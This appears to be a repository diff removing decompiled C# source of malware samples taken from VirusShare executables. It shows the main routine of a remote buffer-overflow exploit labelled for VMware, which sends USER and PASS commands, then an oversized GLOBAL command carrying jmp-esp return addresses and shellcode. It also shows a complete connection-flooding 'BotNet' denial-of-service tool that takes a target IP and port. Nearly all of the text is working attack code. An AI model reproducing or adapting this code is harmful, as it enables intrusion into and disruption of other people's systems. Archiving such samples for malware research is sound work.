public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP;
public static unsafe void usage()
{
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040, __arglist ());
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040, __arglist ());
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040, __arglist ());
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
}
public static unsafe int main(int argc, sbyte** argv)
{
if (argc != 6)
{
\u003CModule\u003E.usage();
return 0;
}
WSAData wsaData;
\u003CModule\u003E.WSAStartup((ushort) 514, &wsaData);
uint num1 = \u003CModule\u003E.socket(2, 1, 6);
sockaddr_in sockaddrIn;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ref sockaddrIn = (short) 2;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &sockaddrIn + 2) = (short) \u003CModule\u003E.htons((ushort) \u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 8)));
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &sockaddrIn + 4) = (int) \u003CModule\u003E.inet_addr((sbyte*) *(int*) ((IntPtr) argv + 4));
if (\u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 20)) != 0)
{
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
}
else
{
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
}
if (\u003CModule\u003E.connect(num1, (sockaddr*) &sockaddrIn, 16) == -1)
{
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040, __arglist ());
return -1;
}
\u0024ArrayType\u00240x8011bcc8 arrayType0x8011bcc8;
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
// ISSUE: cpblk instruction
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040, 6);
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 12));
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
uint num2 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num2, 0);
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
// ISSUE: cpblk instruction
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040, 6);
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 16));
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
uint num3 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num3, 0);
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
// ISSUE: cpblk instruction
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040, 8);
int num4 = (int) ((IntPtr) &arrayType0x8011bcc8 + 11);
uint num5 = 36;
do
{
// ISSUE: cpblk instruction
__memcpy(num4 - 4, ref \u003CModule\u003E.\u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040, 4);
// ISSUE: cpblk instruction
__memcpy(num4, ref \u003CModule\u003E.Jmp_ESP, 4);
num4 += 8;
--num5;
}
while (num5 > 0U);
// ISSUE: cast to a reference type
// ISSUE: cpblk instruction
__memcpy((\u0024ArrayType\u00240x8011bcc8&) ((IntPtr) &arrayType0x8011bcc8 + 295), ref \u003CModule\u003E.shellcode, 141);
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
uint num6 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num6, 0);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040, __arglist ());
\u003CModule\u003E.closesocket(num1);
\u003CModule\u003E.WSACleanup();
return 1;
}
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int printf([In] sbyte* obj0, __arglist);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int WSACleanup();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int closesocket([In] uint obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int send([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint strlen([In] sbyte* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe sbyte* strcat([In] sbyte* obj0, [In] sbyte* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int recv([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int connect([In] uint obj0, [In] sockaddr* obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint inet_addr([In] sbyte* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int atoi([In] sbyte* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern ushort htons([In] ushort obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint socket([In] int obj0, [In] int obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int WSAStartup([In] ushort obj0, [In] WSAData* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint _mainCRTStartup();
}

15
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/sockaddr.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: sockaddr
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[MiscellaneousBits(1)]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 16, Pack = 1)]
internal struct sockaddr
{
}

15
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/sockaddr_in.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: sockaddr_in
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[MiscellaneousBits(1)]
[StructLayout(LayoutKind.Sequential, Size = 16, Pack = 1)]
internal struct sockaddr_in
{
}

3
MSIL/Flooder/Win32/B/Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3/AssemblyInfo.cs
View File

@ -1,3 +0,0 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]

101
MSIL/Flooder/Win32/B/Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3/Bot.cs
View File

@ -1,101 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Bot1.Bot
// Assembly: Bot1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 20DD3A26-8F2D-4308-84CA-4E2001F5A7BC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3.exe
using System;
using System.Collections;
using System.Threading;
namespace Bot1
{
public class Bot
{
private int type;
private int port;
private string ip;
public Bot(string _ip, int _port, int _type)
{
this.type = _type;
this.ip = _ip;
this.port = _port;
}
public void Start()
{
int num1 = 0;
ArrayList arrayList1 = new ArrayList();
ArrayList arrayList2 = new ArrayList();
while (true)
{
switch (this.type - 1)
{
case 0:
if (num1 == 0)
{
try
{
arrayList2.Add((object) new Connection(arrayList2.Count + 1, this.ip, this.port));
arrayList1.Add((object) new Thread(new ThreadStart(((Connection) arrayList2[arrayList2.Count - 1]).Connect)));
((Thread) arrayList1[arrayList1.Count - 1]).Start();
}
catch (Exception ex)
{
}
}
for (int index = 0; index < arrayList2.Count; ++index)
{
((Connection) arrayList2[index]).UpdateStatus();
if (((Connection) arrayList2[index]).status == 2)
{
try
{
arrayList2[index] = (object) new Connection(index, this.ip, this.port);
arrayList1[index] = (object) new Thread(new ThreadStart(((Connection) arrayList2[index]).Connect));
((Thread) arrayList1[index]).Start();
}
catch (Exception ex)
{
}
}
}
int num2 = 0;
int num3 = 0;
num1 = 0;
for (int index = 0; index < arrayList2.Count; ++index)
{
switch (((Connection) arrayList2[index]).status)
{
case 0:
++num2;
break;
case 1:
++num3;
break;
case 2:
++num1;
break;
}
}
Console.WriteLine("unknown = " + num2.ToString() + "; connected = " + num3.ToString() + "; disconnected = " + num1.ToString());
continue;
case 1:
try
{
arrayList1.Add((object) new Thread(new ThreadStart(new Connection(arrayList1.Count + 1, this.ip, this.port).Connect)));
((Thread) arrayList1[arrayList1.Count - 1]).Start();
}
catch (Exception ex)
{
}
Console.WriteLine("attempts = " + arrayList1.Count.ToString());
continue;
default:
continue;
}
}
}
}
}

17
MSIL/Flooder/Win32/B/Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3/Bot1.cs
View File

@ -1,17 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Bot1.Bot1
// Assembly: Bot1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 20DD3A26-8F2D-4308-84CA-4E2001F5A7BC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3.exe
using System;
using System.Windows.Forms;
namespace Bot1
{
public class Bot1
{
[STAThread]
private static void Main() => Application.Run((Form) new FormMain());
}
}

74
MSIL/Flooder/Win32/B/Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3/Connection.cs
View File

@ -1,74 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Bot1.Connection
// Assembly: Bot1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 20DD3A26-8F2D-4308-84CA-4E2001F5A7BC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3.exe
using System;
using System.Net;
using System.Net.Sockets;
namespace Bot1
{
public class Connection
{
public int id;
public int status = 2;
private IPAddress ip;
private int port;
private Socket client;
public Connection(int _id, string _ip, int _port)
{
this.id = _id;
this.ip = IPAddress.Parse(_ip);
this.port = _port;
try
{
this.client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
}
catch (Exception ex)
{
this.status = 2;
}
}
public void Connect()
{
this.status = 0;
try
{
this.client.BeginConnect((EndPoint) new IPEndPoint(this.ip, this.port), new AsyncCallback(Connection.ConnectCallback), (object) this);
}
catch (Exception ex)
{
this.status = 2;
}
}
public static void ConnectCallback(IAsyncResult result)
{
try
{
if (((Connection) result.AsyncState).client.Poll(10, SelectMode.SelectWrite))
((Connection) result.AsyncState).status = 1;
else
((Connection) result.AsyncState).status = 2;
}
catch (Exception ex)
{
((Connection) result.AsyncState).status = 2;
}
}
public void UpdateStatus()
{
if (this.status != 1)
return;
if (this.client.Poll(10, SelectMode.SelectWrite))
this.status = 1;
else
this.status = 2;
}
}
}

48
MSIL/Flooder/Win32/B/Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3/Flooder.Win32.BotNet.csproj
View File

@ -1,48 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8FC90CE6-8481-4D0B-B763-AED74246BA77}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>Bot1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>Bot1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Bot1.cs" />
<Compile Include="Bot.cs" />
<Compile Include="Connection.cs" />
<Compile Include="FormMain.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="FormMain.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Flooder/Win32/B/Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3/Flooder.Win32.BotNet.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bot1", "Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3.csproj", "{8FC90CE6-8481-4D0B-B763-AED74246BA77}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8FC90CE6-8481-4D0B-B763-AED74246BA77}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8FC90CE6-8481-4D0B-B763-AED74246BA77}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8FC90CE6-8481-4D0B-B763-AED74246BA77}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8FC90CE6-8481-4D0B-B763-AED74246BA77}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

182
MSIL/Flooder/Win32/B/Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3/FormMain.cs
View File

@ -1,182 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Bot1.FormMain
// Assembly: Bot1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 20DD3A26-8F2D-4308-84CA-4E2001F5A7BC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3.exe
using System;
using System.ComponentModel;
using System.Drawing;
using System.Resources;
using System.Threading;
using System.Windows.Forms;
namespace Bot1
{
public class FormMain : Form
{
private bool stopProcessing = false;
private Thread thread;
private Button ButtonClose;
private GroupBox GroupParameters;
private Button ButtonStart;
private Button ButtonStop;
private Label label1;
private TextBox ip;
private TextBox port;
private StatusBar Status;
private RadioButton OptionIntelegent;
private RadioButton OptionBrute;
private Container components = (Container) null;
public FormMain() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ResourceManager resourceManager = new ResourceManager(typeof (FormMain));
this.ButtonClose = new Button();
this.GroupParameters = new GroupBox();
this.OptionBrute = new RadioButton();
this.OptionIntelegent = new RadioButton();
this.label1 = new Label();
this.port = new TextBox();
this.ip = new TextBox();
this.ButtonStart = new Button();
this.ButtonStop = new Button();
this.Status = new StatusBar();
this.GroupParameters.SuspendLayout();
this.SuspendLayout();
this.ButtonClose.DialogResult = DialogResult.Cancel;
this.ButtonClose.Location = new Point(221, 7);
this.ButtonClose.Name = "ButtonClose";
this.ButtonClose.Size = new Size(56, 24);
this.ButtonClose.TabIndex = 6;
this.ButtonClose.Text = "Close";
this.ButtonClose.Click += new EventHandler(this.ButtonClose_Click);
this.GroupParameters.Controls.AddRange(new Control[7]
{
(Control) this.OptionBrute,
(Control) this.OptionIntelegent,
(Control) this.label1,
(Control) this.port,
(Control) this.ip,
(Control) this.ButtonStart,
(Control) this.ButtonStop
});
this.GroupParameters.Location = new Point(4, 2);
this.GroupParameters.Name = "GroupParameters";
this.GroupParameters.Size = new Size(212, 80);
this.GroupParameters.TabIndex = 3;
this.GroupParameters.TabStop = false;
this.OptionBrute.Location = new Point(8, 59);
this.OptionBrute.Name = "OptionBrute";
this.OptionBrute.Size = new Size(75, 16);
this.OptionBrute.TabIndex = 9;
this.OptionBrute.Text = "brute";
this.OptionIntelegent.Checked = true;
this.OptionIntelegent.Location = new Point(8, 42);
this.OptionIntelegent.Name = "OptionIntelegent";
this.OptionIntelegent.Size = new Size(75, 16);
this.OptionIntelegent.TabIndex = 8;
this.OptionIntelegent.TabStop = true;
this.OptionIntelegent.Text = "intelegent";
this.label1.AutoSize = true;
this.label1.Font = new Font("Arial", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.label1.Location = new Point(136, 18);
this.label1.Name = "label1";
this.label1.Size = new Size(8, 13);
this.label1.TabIndex = 7;
this.label1.Text = ":";
this.port.Location = new Point(144, 16);
this.port.Name = "port";
this.port.Size = new Size(40, 20);
this.port.TabIndex = 2;
this.port.Text = "80";
this.ip.Location = new Point(24, 16);
this.ip.Name = "ip";
this.ip.Size = new Size(110, 20);
this.ip.TabIndex = 1;
this.ip.Text = "127.0.0.1";
this.ButtonStart.Location = new Point(91, 45);
this.ButtonStart.Name = "ButtonStart";
this.ButtonStart.Size = new Size(56, 24);
this.ButtonStart.TabIndex = 4;
this.ButtonStart.Text = "Start";
this.ButtonStart.Click += new EventHandler(this.ButtonStart_Click);
this.ButtonStop.Enabled = false;
this.ButtonStop.Location = new Point(147, 45);
this.ButtonStop.Name = "ButtonStop";
this.ButtonStop.Size = new Size(56, 24);
this.ButtonStop.TabIndex = 5;
this.ButtonStop.Text = "Stop";
this.ButtonStop.Click += new EventHandler(this.ButtonStop_Click);
this.Status.Location = new Point(0, 89);
this.Status.Name = "Status";
this.Status.ShowPanels = true;
this.Status.Size = new Size(281, 22);
this.Status.TabIndex = 7;
this.AutoScaleBaseSize = new Size(5, 13);
this.CancelButton = (IButtonControl) this.ButtonClose;
this.ClientSize = new Size(281, 111);
this.Controls.AddRange(new Control[3]
{
(Control) this.Status,
(Control) this.GroupParameters,
(Control) this.ButtonClose
});
this.Font = new Font("Arial", 8.25f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0);
this.Icon = (Icon) resourceManager.GetObject("$this.Icon");
this.Name = nameof (FormMain);
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "Bot";
this.GroupParameters.ResumeLayout(false);
this.ResumeLayout(false);
}
private void ButtonClose_Click(object sender, EventArgs e)
{
this.thread.Abort();
Application.Exit();
}
private void ButtonStart_Click(object sender, EventArgs e)
{
this.ip.Enabled = false;
this.port.Enabled = false;
this.ButtonClose.Enabled = false;
this.ButtonStart.Enabled = false;
this.ButtonStop.Enabled = true;
this.stopProcessing = false;
this.Start();
}
private void ButtonStop_Click(object sender, EventArgs e)
{
this.ip.Enabled = true;
this.port.Enabled = true;
this.ButtonClose.Enabled = true;
this.ButtonStart.Enabled = true;
this.ButtonStop.Enabled = false;
this.stopProcessing = true;
}
private void Start()
{
int _type = 1;
if (this.OptionBrute.Checked)
_type = 2;
this.thread = new Thread(new ThreadStart(new Bot(this.ip.Text, (int) short.Parse(this.port.Text), _type).Start));
this.thread.Start();
while (!this.stopProcessing)
Application.DoEvents();
this.thread.Abort();
}
}
}

129
MSIL/Flooder/Win32/B/Flooder.Win32.BotNet-11803bea825d1019c1c625a35ddac314d1b24b11958883eb4cc10b0fde3423f3/FormMain.resx
View File

@ -1,129 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
